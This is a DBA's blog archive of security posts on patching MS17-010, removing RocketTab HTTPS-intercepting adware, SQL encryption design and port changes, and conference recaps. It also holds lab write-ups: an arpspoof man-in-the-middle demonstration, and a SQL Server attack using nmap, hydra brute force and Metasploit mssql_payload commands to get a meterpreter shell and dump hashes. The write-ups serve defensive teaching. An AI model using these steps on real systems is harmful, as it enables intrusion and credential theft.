Category Archives: Security

Just Reboot

Normally I’d rather dig into a problem and figure out what is going on rather than just reboot… but since June is right around the corner and my last post was in February I’m in need of a quick writing fix.


Now that I have rebooted, I don’t have a lot of evidence to troubleshoot why there was issues. So, only one way to go, forward!

Today’s topic is patching software from the early 90s.

March 14th, 2017, Microsoft came out with this critical Security Bulletin:

Ransomware WannaCry uses this vulnerability to take over and spread itself. SMB1 was spawned from an effort to get the DOS local file system to be a network file system. Microsoft’s implementation piled on a bunch of features and became cool right around the time these pants hit center stage.








SMB not a secure server service? Where have I heard this before? MS08-067 was an epic vulnerability that was exploited years after the patch was released. I remembered that bulletin number off the top of my head and I’m sure MS17-010 will get baked in there too. After all, MS17-010 is in metasploit now.

So this many years later, why is this an issue? Mostly backwards compatibility because SMB2&3 are not vulnerable but the server service happily falls back to SMB1 if you let it. We have these absolutely infuriating printers that only support SMB1 so we can’t disable SMB one on the clients. I also blame cloud and devops. New server admins are exposing “things” to the internet for no reason other than convenience and ignorance. While I’m pointing fingers, lets roast Microsoft for creating massive downloads and overly complicated and slow patching systems. Not only are they slow but they are also fragile. Users are not innocent either, they must click all the attachments in their email spawning malware in privileged network locations. Also, users don’t want to agree to lengthy monthly maintenance windows.

Now that we know it is everyone elses fault, what can I do better? In my position, persuasion is a powerfull tool. Automatic maintenance and regular automatic testing are the only ways to scale. More cattle for servers and fewer pets that require special needs. Persuading people that 24/7 uptime is not necessary and more swift automatic patches will take some work. Convincing application developers to handle boot order rather than relying on the servers to boot up in a specific order would help make automation easier and fix a bunch of other potential issues in the process. Creating simpler architectures and not unnecessarily complex microservices. Controlling server sprawl with proper documentation and life-cycle management.

So how did I handle this specific critical vulnerability? It was a team effort for sure. The work really starts as the servers are being built. Requestors either accept a default windows patching window or ask for a custom one. There are automated tests in place that allowed us to proceed with confidence. We used our montioring systems to identify low OS drive space and I check the vCenter database to cross and double check before the package was pushed out. There was a validation script on github that I used to monitor progress And finally, go through manually and repair the unpatched servers or migrate the workload to newly built servers.

Overall, patchapalooza 2k17 went pretty well. Sometimes I think vulnerability databases have too many false alarms and its hard to pick out what is really serious issue. Forcing out that many reboots can have significant risk to systems, especially if you don’t have the people to handle the increased calls.

Leave a comment

Posted by on May 24, 2017 in Security


RocketTab Must Die

RocketTab is spyware that is passing itself off as adware. It proxies your http and https connections to the internet and injects boatloads of garbage ads into legitimate websites. This is hijacking with a lousy excuse of making your search “better” by modify your top search results. It is buggy which causes errors in browsing and is dangerously similar to the Superfish software that Lenovo was placing on its PCs. This method of MITM attacking to push ADs must die a painful death.

I’m not sure I like the ad supported direction that media is going. I’m also not sure I like paying for things either… and yes I understand the contradiction. What I am sure about is we need to scale the ads and general invasion of privacy back a notch or three. This software is getting installed without users understanding of what is happening. It is spawned from greed and lousy, immoral business practices.

I pay for Netflix, I rent movies, I go to the theater, I watch adds and I am ok with the collection of my viewing history for the sites that I intend to go to BY the sites that I go to like YouTube and Hulu. But I have recently had a first hand experience with this garbage called RocketTab.

That Dirty, Disgusted Feeling

I went for a trip to visit my mom and hopped on her computer because I forgot to set my out-of-office responses. I opened an incognito window and logged into my personal email and then was about to log into my work email when I noticed something strange.


That is definitely not the issuer of my work’s public webmail certificate. Fiddler is actually perfectly legitimate web debugging software. So am I correct in thinking that these lazy sloth developers of crapware reused the Fiddler certificate?

Normally, if the HTTPS part is green I don’t bother checking the certificate. For some reason we were just talking at dinner about Lenovo and their missteps so I got curious and checked. I consider myself security consious and I have already sent my personal email information to a man-in-the-middle attacker. I had almost sent over my work credentials too.

I started looking at netstat. I saw that when I would open the browser it was connecting to a proxy in the staus bar. I took a look at resource monitor and saw a boatload of public internet address that this “Client.exe” was connected to. Netstat showed Client.exe has a port 49181 listener. Chrome is supposed to be connecting to the public internet, not Client.exe.


The first thing I did was go into “Manage Computer Certificates” and delete the two Fiddler certificates from the root store. This was successful in changing the green chrome lock to a proper red error.

The next thing I did was remove the proxy from lan settings.


After that I removed “RocketTab” from programs via the control panel. As soon as this was done all the “Client.exe” connections went to TIMER_WAIT status because they were reset. RocketTab was the culprit.

The last thing I did was change all my passwords.

This man-in-the-middle attack on client machines needs to stop. This is a sneaky activity that is not something normal users understand. They generally don’t want the junk applications that these type of ad services support anyway. Users have been socially engineered to install this stuff and it is not clear how to get rid of it or that it is even running in the background. It is a poor business model that needs destroyed.

Leave a comment

Posted by on March 7, 2015 in Security


#SQLSatDet has made the front page

The short list of upcoming events now includes SQL Saturday #292 in Detroit

Free training, free networking and only $12 for lunch. Best you cancel your plans for May 17 and find your way to Lawrence Technological University.

The speakers who submitted by the original deadline have been confirmed for at least one session. That means you will have a chance to listen to me talk about SQL Server Security in my Hacking SQL Server session. I really enjoyed speaking last year at this event and look forward to this years event including all the pre and post activities.

Here is my recap from last year:

Leave a comment

Posted by on April 10, 2014 in PASS, Security, SQL Admin



Arp Spoofing with arpspoof

Consider someone has hijacked your DNS server. That person modifies the record for “” to point to their IP address. At no additional charge, after capturing all the packets, they will kindly forward them on the the real prod_database. That would be a layer 7 to layer 3 link switcheroo.

Arp spoofing is a similar concept but instead of names to IPs, we modify the IP(layer 3) to MAC(layer 2) relationship. To demonstrate a successful spoof, I have to tell another client on my LAN that I am the gateway, and tell the gateway that I am that client.

In order to see the damage of arp spoofing you can look at your arp table while being spoofed. Type “arp -a” at a windows command prompt in order to view the contents of your arp cache. Arp spoofing is also called arp poisoning because of the false records that the tool is able to get added to a victim’s arp cache.

Using Kali Linux as the attacker, a fresh trial of Windows 2012 R2 as the victim, VMware Player, and the command line tool arpspoof I was able to successfully capture the victim’s traffic. For the traffic to flow through Kali, the first step is to turn on port forwarding. Then in step 2 and 3 we tell the subnet some lies.


The poising has started. If you want to see this traffic you can use the “arp” filter in Wireshark.


Finally, to offer some proof, I browse to Wikipedia on the victim’s machine and view the traffic on the attacker’s machine.


The defenses to this attack include SSL/TLS, OS hardening and duplicate MAC detection among other things. Unfortunately this is how some proxy like tools work and you might not be able to use all of those methods to stop the attack.


Leave a comment

Posted by on March 10, 2014 in Network Admin, Security


Hacking SQL 2014 CTP1 on Windows Server 2012 R2

I have some priors on this topic here and here so if this is your first time I highly suggest you check out those and especially my take on ethics here

I wanted to test out the tools to make sure there were not any new gotchas with the latest and greatest versions of MSSQL and Windows Server. At the heart of this hack is brute forcing a SQL Auth account. I didn’t expect Microsoft to come up with any additional ways to prevent a server from being misconfigured and allowing this attack. What I wasn’t so sure about is if Microsoft had come up with a way to A, prevent the payload from executing or B prevent the payload from dumping the password hashes.

Here is our lesson plan for today.
1. find an instance
2. brute force an account
3. deliver a payload
4. use meterpreter to dump the hashes


First up is to install SQL Server. We’ll want to install the database engine, which is the service we are going to exploit, and also the management tools to make it super easy to misconfigure. My previous setup used VMWare player for the SQL box which got a little hairy. Turns out VMWare takes a bit to support new Windows operating systems so Hyper-V was a good choice for this test.


Next up to bat is the boneheaded administrator. Scumbag DBA is going to do a few things to this box to make it super easy for us to deploy our hacker tools. Those misconfigurations include:

1. Local windows administrator service account
2. SQL Auth enabled
3. SQL User with an easy password and the sysadmin server role


Now that we’re ready to rock and roll I decided to use VMWare player for Kali Linux as my attacker machine. I was able to identify that Microsoft SQL Server was at the other end of port 1433 with nmap.


This did however trip a very important SQL Log entry. I’m not sure if this is new to SQL 2014 but someone should contact nmap :]

09/28/2013 09:05:18,Logon,Unknown,The login packet used to open the connection is structurally invalid; the connection has been closed. Please contact the vendor of the client library. [CLIENT:]
09/28/2013 09:05:18,Logon,Unknown,Error: 17832 Severity: 20 State: 18.

After using the brute force tool “hydra”, we have a identified a valid username and password of tom/tom. This generates some more log entries. No supprises here:

09/28/2013 09:34:10,Logon,Unknown,Login failed for user 'tom'. Reason: Password did not match that for the login provided. [CLIENT:]
09/28/2013 09:34:10,Logon,Unknown,Error: 18456 Severity: 14 State: 8.
09/28/2013 09:34:10,Logon,Unknown,Login failed for user 'tom'. Reason: Password did not match that for the login provided. [CLIENT:]
09/28/2013 09:34:10,Logon,Unknown,Error: 18456 Severity: 14 State: 8.
09/28/2013 09:34:10,Logon,Unknown,Login failed for user 'tom'. Reason: Password did not match that for the login provided. [CLIENT:]
09/28/2013 09:34:10,Logon,Unknown,Error: 18456 Severity: 14 State: 8.

Now that we have a valid username and password we can use the metasploit framework to send our payload and attempt to retrieve the hashes. The commands to complete this are:

use exploit/windows/mssql/mssql_payload
set password tom
set username tom
set rhost
set lhost
migrate 2136


Aaaaaaand we’ve got Build 9200 giving us the goods. Getting the hashes allows for lateral movement. All SQL servers on the same domain could very well be at risk now that one SQL Server has been taken advantage of. The key here is to avoid the misconfigurations on ALL servers.

This malicious activity does generate some more notable log activity. Notice that we never enabled xp_cmdshell, the delivery of the payload did that for us.

09/29/2013 09:27:22,spid55,Unknown,Configuration option 'xp_cmdshell' changed from 0 to 1. Run the RECONFIGURE statement to install.
09/29/2013 09:27:22,spid55,Unknown,Configuration option 'show advanced options' changed from 0 to 1. Run the RECONFIGURE statement to install.
09/29/2013 09:27:22,spid55,Unknown,SQL Server blocked access to procedure 'sys.xp_cmdshell' of component 'xp_cmdshell' because this component is turned off as part of the security configuration for this server. A system administrator can enable the use of 'xp_cmdshell' by using sp_configure. For more information about enabling 'xp_cmdshell' search for 'xp_cmdshell' in SQL Server Books Online.

The goal here is to help everyone be more secure by identifying and testing some basic misconfigurations. We’ve proved that patching alone won’t protect you from all evils.

Leave a comment

Posted by on October 1, 2013 in Network Admin, Security, SQL Admin


Encryption and Decryption for the Web Application

Missy Elliot Encryption

Encryption is more about the implementation of the algorithm than the algorithm itself. My recent research has made me come to the conclusion that AES 256 is good choice for Symmetric key algorithm. I have veered away from 3DES because of some claims of its weakness.

Lets say we need to store SSN, and retrieve SSN, and there is no way around it. I need to to run a credit report and then need it again to file some kind of government form on a regular basis. The business unit says I can’t just keep asking for this data so I have to store it.

I’m going to make an assumption here that we want to keep this data safe, not just because of some compliance requirement… but because we care about our customers data. First lets follow the data along it’s theoretical path with some potential exposures. Think of a GPS application where you enter your destination and it uses your current location to define a route. This is what I call the data route.

Defining the Data Route

Call center asks customer over the phone SSN

    prism! Just metadata you say? Ok phew.
    calls are recorded for quality control

Call center agent or customer enters the SSN into the browser based form

    key loggers
    screen captures
    browser saves form data for your convenience

Browser packages this up and sends it over the wire to the server

    network sniffers
    browser history(you wouldn’t put this in a URL param but just in case…)
    performance monitors
    intrusion detection systems

Web Server application processes the data

    application dump
    data read from unprotected memory by another process
    code persists data to disk(copy paste)
    hibernation file is snagged with data from memory
    server low on memory and pages data to disk(copy paste)
    debugging tools decompile code

Web Server sends data over the wire to the database

    network sniffers
    performance monitors
    SQL Traces
    parameters are stored with query plans

Database persists the data

    Select * from ssn
    copy & paste .mdf
    data is pumped out to reporting applications
    data is given to developers for debugging
    prod is copied to Quality Assurance servers
    SAN mirrors data offsite
    Rouge DBA or other Admin

Database Backs-up the data over the wire to a file share

    all that same network goodness
    copy/paste the file share

Ok, scared now… lets talk about encryption

To simplify the matter, there are three pieces needed to encrypt/decrypt

1. The Data (a single cell)
2. The Key
3. The Algorithm

Lets make a small distinction right off the bat. These three things live in memory at the time of the encryption/decryption. That doesn’t mean they have to be persisted to disk in that same location. Here is a good discussion on the matter of key storage You can shred up your key and store it in several locations but just know you have added several single points of failure. Single points of failure can cause data loss, not just for the hacker but for your business.

The goal of our encryption is to prevent those who have gained access to the data, still not be able to read the data. It’s an additional layer to prevent as many of the vulnerabilities above as we can. From a security standpoint, encrypting at the earliest possible point in the data route would considered a best pratice. Unfortunately those methods are not always feasable. Your users would hate you if you implemented a custom keyboard.

encryption keys

Three potential solutions

Option A: We write code to do it on the web servers.

Another pretty thorough sample.

This option has more pros than cons. We are pretty far up the data route so if we chose SSL to protect the data over the internet, we could then encrypt the SSN on the web server and the rest of the route would be protected. Encryption is CPU intensive so a web server that scales out well is a good choice for this process. One con is that web servers are usually exposed to a larger audience of malicious type folks.

Option B: We change SQL Statements and do it on the SQL Server.

This requires changing queries to include a passphrase as a parameter. I’m not a fan since the encryption key is persisted stored on the same host as the data. It does add the benefit of not allowing db_datareader access to plaintext data.

Option C: We make minor changes and utilize TDE on the SQL Server.

This is an option that may allow an auditor to check some proverbial box. It can add anywhere from 5-25% overhead and encrypts the entire database as it rests on disk. db_datareader can still read plaintext SSNs so not much protection. If an attacker copied the .mdf, they generally have access to copy the keys too. It might help with the backup security vulnerability.

Other Points
Consider a hacker has compromised one of your customers SSNs from, I don’t know… maybe the government of South Carolina. With the name and SSN can the hacker reverse engineer your algorithm to figure out the key and compromise the rest of your customers data?

Key rotation is a good idea. If you realize your key has been compromised, you will want a well documented way to change that key. You may need to decrypt and re-encrypt all of your data with the new key.

Algorithms are usually public knowledge and built into high level languages such as Java and .NET. Salt is a good way to mask the algorithm and key.


Application layer encryption add a vast amount of protection to the data on the database server. DBAs no-longer have dnclip enabled for all of your customers data. This provides separation of duties and separation of the three key pieces of the puzzle.

Leave a comment

Posted by on July 1, 2013 in Security


#BSidesDetroit conference recap

Here is my Matrix style pic from the 38th floor of the RenCen in Detroit, MI. Queue echoy base baooooooo sound.


For a mere $206 a night you can stay at the Marriot too but I wouldn’t recommend it. Location was good since the conference was right downstairs. There were cheaper hotels but I didn’t want to walk the streets of D-Town without a crowd. I split the room with a co-worker so I could afford a little nicer location.

I considered submitting a session but I wanted to get a feel for the conference since it was my first Security B-Sides event. I volunteered for the conference mainly because I know from experience that is a good way for my introverted self to get more involved.

This was a Friday – Saturday gig so I woke up crazy early and drove to Detroit Friday morning. There was good organization and almost too many volunteers ready to assist at the check-in. Coffee was hot and ready so I studied the sessions and layout so I could assist anyone with my bright yellow shirt on.

The keynote by Kellman Meghu (@kellman) was an all-around good opening act. He covered his enterprise class firewall system he deployed in his house to monitor his family and open wifi visitor usage. It was eye opening to see some of the data like hippa keywords for early medical alerts, swear charts, dating site conversations, false positives, random forum board usage, and malware events be so easily extracted and condensed. He didn’t even tamper with any SSL traffic which he hinted at maybe doing in the future. Spoiler alert, “porn” was the most popular inappropriate word used on his network (I know shocking right?!).

I saw the conference had the lock picking station setup so I sat down and tried it out. At GrrCON 2012 I picked the first and only lock I had ever picked until now. That Friday I pwned several locks including this one:


There were a few other highlights Friday.

The Michigan Cyber Range is a great effort to help drum up support for ethical hacking.

James Foster gave a talk on “Insidious Implicit Windows Trust Relationships” that was spot on. It’s a problem that doesn’t really have a secure solution besides scrapping active directory. He discussed cached credentials that are stored hashes and in-memory tokens that can reveal plain text passwords. I’ve heard bits and pieces of the malicious SMB server and he briefly explained it here as well. The session explained a lot of the basics very well and definitely left me wanting to do more research.

As I learn powershell, I learn to hate it more and more but I know eventually my mind will make the switch. Matt Johnson @mwjcomputing has helped put together a swarm of good looking scripts to aide with server setup and baselines. The baseline appears to be key in incident response so you can identify that nasty malicious crap which does not belong. Also, checking in the server build to source control keeps it safe(*see footnote 1) and ready for deployment.

The after party was at Tom’s Oyster Bar (not exactly shellfish allergy friendly but I escaped without incident). Sequris kindly sponsored a couple drinks, cheap appetizers and some weird sexual looking prizes stuffed with candy. We left when the beer ran out and headed over to the Detroiter which was a dive a couple blocks away. We considered the Volt bar but it was crazy expensive so we called it a night.


Day 2 was mind blowing. I highly recommend attending a workshop by @armitagehacker. His wares are top of the line and he is also a great presenter. I hope to find some time to finish the expanded workshop steps in the near future, maybe another post on that. I did some recon for Raphael on Friday to make sure there was power and enough space for us. But that was really the end of my usefulness, the other volunteer showed up early and really took care of business including organizing a sandwich order from which was awesome.

Raphael joked that during the workshop there was always someone, for some reason, that couldn’t get the hacks to work. They were nicknamed the anti-neo. Fortunately I wasn’t the anti-neo and was able to pop my first penguin.


I was running out of gas and mental storage space but managed to attend a few more sessions on Saturday. I would like to give some props to @alexgatti for managing a very philosophical discussion with some smooth professionalism. He points out some gaps between the end of college and the start of a career in IT security. A general consensus of the crowd was wondering why more college students don’t attend conferences since that might help. The problem, IMHO, is time and money. Full time students are busy and broke. Class attendance is a necessary evil. My professors never really made is clear I could attend a conference and not fall behind. Also, I was unaware of these resource that was at my fingertips. I think for the gobs of $ I threw at my university, they could have done a better job of engaging me and forcing me to check some things like that out.

Kevin Poniatowski gave an interesting talk on BYOD. His intent was to advocate for preparation of BYOD because if you don’t already have it at your organization there will be a day when it’s forced on you. The title was a bit misleading because I am more worried about it than before. Someone’s comment I won’t forget was, “How can you be so sure the employee’s device is less secure than the current system?”

BSides Detroit was a great conference. I can’t wait for the next one!

*1 – hah, you actually think I use footnotes?

Leave a comment

Posted by on June 12, 2013 in Security


Non-Standard SQL Port

As a DBA, I have heard of a defensive maneuver that is supposed to help throw the hackers off your scent. That maneuver is configuring a non-standard port for the database engine, something other than 1433.

We first need to understand a standard configuration. If you select only the database engine on install, the default instance listens on TCP port 1433. No firewall changes are made so that is something you have to do post install. The SQL Browser service is disabled because it is not required. UDP/1434 was used by the SQL Slammer worm and took advantage of poor network packet handling of the SQL Browser service. I recommend you leave this service disabled.

In previous attacks I have demonstrated, during the information gathering phase, we locate a SQL Server using nmap or zenmap. We assume this is a SQL Server because port 1433 is open. You can find a good listing of default ports on wikipedia. You can also find a good list of windows ports in your services file usually located in c:\windows\system32\drivers\etc\

Rather than discuss whether we should or should not change the SQL Port what I want to do it test out the effectiveness of the tools if the port is changed. To change what port SQL listens on for remote connections, there are three spots in the SQL Server configuration manager we have to change.

First, I like to change the listen all setting to no.

Then, find your IPv4 address and enable listening on it and change the port.

Now, we have to change the firewall. I’ve added an extra rule, then verified I could connect using the “IP,port” in SSMS.


Penetration Testing

The only thing a port change will defend against is the information gathering phase of a hack. If we do a quick scan with zenmap, I noticed that this change is at least partially effective. The ms-sql port doesn’t light up green like we are used to. In fact, no open port is identified by a quick scan.


What we have to do is open up our scan. The intense all TCP ports is very time consuming. I doubt a hacker would wait this long for a single host, I sure didn’t.


nmap has a lot options and switches we can experiment with. I did notice the option “-p T:” which will try TCP ports within the range supplied. This completes in a reasonable amount of time.


However, the service identification is missing. By changing the command a bit we can identify that the service is SQL, just not the exact version.


As you can see the port change was ultimately ineffective. The fact that the host is always easily identified as online will draw the attention of an attacker. With a small amount of persistence, the attacker can identify the target as a SQL Server.

Leave a comment

Posted by on March 25, 2013 in Security, SQL Admin


#SQLPASS #SQLSatDetroit recap

I attended my third SQL Saturday event March 16th, 2013. This was the first one I decided to submit an abstract to and I am really glad I did. I’ve been geeked out on my presentation topic the last 6 months so that helped me push past any nerves.

I also volunteered but the hard work of others didn’t leave much leftover. After 200+ of these SQL Saturday events the community has a pretty good handle on how to make it a success. This was Detroit’s first so were plenty of unknowns. Lawrence Tech turned out to be a great location. There was plenty of open space between all of the classrooms for discussion and sponsors. The cafeteria simplified setup, delivery and cleanup of lunch. We were able to access the facility early and staff was onsite to help. 4G service was good and wifi was open.


There was 5 tracks two with larger rooms and 3 with smaller rooms. I got one of the smaller rooms which was fine with me. I don’t like microphones and my voice doesn’t project particularly well. However, I did hear that some folks would have like to attend but the room was already packed.



And some older demo steps:

I was very happy with my delivery. I’m definitely not a natural but I can sense that I am getting a little better each time. I have to give a big thanks to the developers of Kali Linux. They shipped a solid product that demoed nicely. I was very concerned jumping into the new hotness with only 2 nights of practice but it worked out for the best. Of about 40 attendees, I received 21 reviews for an average score of 4.57/5.

Speaking did distract from attending other sessions. I was a complete zombie after my session and almost missed lunch. That said I think I will give speaking another shot. The #SQLFamily made it an enjoyable and valuable experience. Especially this evaluation comment that made my day and gave me the energy to go get a drink after the event.


1 Comment

Posted by on March 20, 2013 in PASS, Security, SQL Admin


I’m Speaking at #SQLSatDetroit March 16th

What a great way to use up my 100th blog post. I could not think of a better way to pass that milestone than to announce my upcoming session.


Ok, I didn’t really delete that session next to mine but what a great way to get in the mood!

Hacking SQL Server
The best defense is a good offence. Learn how to practice hacking without going to jail or getting fired. In this presentation we’ll be going over how to exploit weak SQL servers with actual tools of the penetration testing trade. You will learn why the SQL Service is a popular target on your network and how to defend against basic attacks. We will also attempt to snag some credentials from the SAM cache so we can go galavanting across the rest of the network.

If you are attending, I encourage you to get a few things installed so you can play along. It’s just more fun that way. VMWare player and BackTrack should get you started. You may want to setup a victim virtual machine as well, or just hack your host computer. Make sure to turn off your host NIC so you don’t make any mistakes and touch the network that you don’t have permission to use inappropriately.

1 Comment

Posted by on March 6, 2013 in PASS, Security, SQL Admin